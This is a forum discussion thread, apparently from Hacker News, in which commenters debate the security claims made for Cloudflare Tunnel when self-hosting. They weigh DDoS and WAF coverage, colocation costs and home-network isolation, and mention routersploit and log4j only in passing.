[qeternity]

> But what if you could host a web service with no ports exposed? Well, you can! Cloudflare Tunnel makes a persistent outbound connection (a tunnel!) between your server and Cloudflare's nearest datacenter. All the traffic to your domain flows through this outgoing tunnel and connects to your server through the protection of Cloudflare. This also has the benefit of being seamlessly encrypted, so you don't have to worry about a thing when it comes to the security of your web service.

Well, a port is exposed, it's just exposed on Cloudflare's reverse proxies. And I think this is probably a dramatic overstatement of the security that Cloudflare provides...

[judge2020]

The point is that it's connected via NAT, so you don't have to worry about port scanners hitting your origin IP and seeing any info about your web server (potentially exposing it to DDOS), and it's overall easier when you don't have to touch your inbound firewall.

[qeternity]

I understand that. That doesn't mean you don't have to worry about security.

Most stacks would crumble under a relatively small L7 ddos that Cloudflare would not likely mitigate.

[lowwave]

well a decent hosting provider such as hetzner provide that service to all their customers. https://www.hetzner.com/unternehmen/ddos-schutz

Being using them for many years, way better and cheaper than AWS.

[janto]

https://www.cloudflare.com/learning/ddos/glossary/web-applic...

[ylk]

https://www.cloudflare.com/plans/#overview

The WAF is $20/month and as far as I know you don't get it automatically for free by using Cloudflare Tunnel, though feel free to correct me. There was the case of them enabling mitigations for the log4j vulnerabilities for anyone on Cloudflare, but that was an exception.

[janto]

Yes, WAF is one of the features you get if you're not on their free app service plan. I think having the option of simply upgrading and turning it on if it becomes necessary, makes the free offering quite attractive.

I haven't used CF in anger, so can't vouch for it more than that.

[qeternity]

We are die hard Cloudflare customers, I am speaking from experience. They are phenomenal, but they aren’t magic.

[janto]

What do you then mean by a "relatively small L7 ddos that Cloudflare would not likely mitigate"? It seems to me that their WAF would mitigate that and I can worry even less about threats.

[brightball]

Could an origin server run a port scanner through the tunnel and hide the origin of the scan?

[rank0]

Well sure the scan would appear to come from cloudflare. But it’d be pretty easy for cloudflare to then identify the tunnel user as the source of the scans.

[rank0]

Well their WAF and dos protection are pretty nice.

An easy secure setup would be to spin up a guest VM and isolate it in its own subnet.

Disable routing between your guest and the rest of your lan and you can sleep easy at night so long as your app doesn’t serve any crazy dynamic content.

[superkuh]

"Walking around covered in body armor and allowing the military to drive me to work in a tank" is nice protection but it's also very restrictive. I don't think the argument against this is so much that Cloudflare doesn't provide nice features as that those features are entirely unneeded for 99.99% of people hosting from home. The downsides of heavy protection are vastly increased complexity and dependence on a non-'dumb pipe' non-ISP corporation which kind of defeats the point of hosting from home.

You really can just host your webserver from home network and forward the port using your consumer grade router and consumer home connection most of the time and nothing bad happens. But this kind of tunneling would be great for when you have a bad ISP that blocks port 80 instead of just saying servers aren't allowed.

[rank0]

Lmao your response made me chuckle. You're entirely right! Probably nothing bad will happen. Especially if you partition your network like I mentioned in my OP.

I would get worried about somehow enabling access to defects in my router by opening some inbound ports. I realize that's a little paranoid...but recently I have been playing around with https://github.com/threat9/routersploit and routinely find defects in consumer routers.

Here's my other beef with cloudflare: Once I gotta pay 200+/mo for their security services or whatever, I could just rent out a private rack in a colocation and throw some old beefy lga-2011 xeon hosts. Now I don't need anything on my LAN exposed and I have dedicated IPs, physical security, and backup generators...etc.

[Karrot_Kream]

> Here's my other beef with cloudflare: Once I gotta pay 200+/mo for their security services or whatever, I could just rent out a private rack in a colocation and throw some old beefy lga-2011 xeon hosts. Now I don't need anything on my LAN exposed and I have dedicated IPs, physical security, and backup generators...etc.

Yeah but now you need to source the hardware for the rack, make sure it stays up and there's no hardware failures, etc, etc. Even simpler is to grab a Linode dedicated box which comes with v4 and v6 IPs and you get all the benefits for only $30 / mo instead.

[rank0]

Second hand dual lga2011 machines are so cheap it’s amazing. Enterprise grade servers are mega reliable I think people overestimate the probability of hardware failure.

A $30 linode box has like 2 vcpus and maybe 4Gb ram.

Where I live I can get a 1U slot in a shared colo rack for $30-$60/mo. Buy a used dual Xeon blade for a few hundred bucks and now I have a setup with 20x the resources. But yeah I admit there’s a lot more manual effort involved.

[Karrot_Kream]

IMO if you can get a 1U for those prices, it's silly not to take it. Where I'm at I can't though and that's where a dedicated Linode box may make more sense.

[superkuh]

You don't have to enable port forwarding to get your router exploited. I'd argue that port forwarding has neither positive nor negative effect on your router's security.

I've been hosting from home for 20+ years and I've never been troubled. But I only run static websites.

[rank0]

Yeah like I said I realize I am being paranoid but there are far fetched scenarios where serving static sites from home could compromise my home network.

Take the recent log4j vulnerabilities. Serving static content and logging trivial fields like request headers would lead to RCE. If that box can route to my home router, and my router has a defect available through routersploit, my network is completely pwned.

A network isolated VM with a tunnel to a remote vps would stop that particular attack.

All that being said…if a sophisticated adversary is targeting me I have to concede there are much easier routes to take.

I’m a security engineer at my day job so I may have conditioned myself into excessive fear.

[superkuh]

A static webserver is just the webserver in my mind. If you use something like nginx you are only going to be surprised by a remote exploit about once every two decades. Yeah, if you use some sprawling set of 'apps' that use things like Log4j on top of your server you're exposing attack surfaces.

[username_my1]

and the fact that all your data will flow through cloudflare and they decide how to use it.

[h4waii]

No no, it's encrypted so you can just completely ignore the security of your web service.

* Broken auth? Doesn't matter, encrypted.

* IDOR? Encryption takes care of it!

* Blind SQL or something from the 90s? EEENNNNCCCRRYYPPPTTIIOOONN!

[sascha_sl]

To be fair, this feature is part of Cloudflare's ZeroTrust offering, so you're meant to put a policy in front of it and forget it. This is great for getting extremely old legacy services that previously relied on VPN network trust onto an actual SSO provider instead.

[diarrhea]

They probably use military-grade hashes too. So you know it is very secure indeed.

[johnhenry]

> ... you can just completely ignore the security of your web service

Be weary of such absolute statements -- especially when it comes to security.

[gmadsen]

you are replying to a sarcastic comment that agrees with you..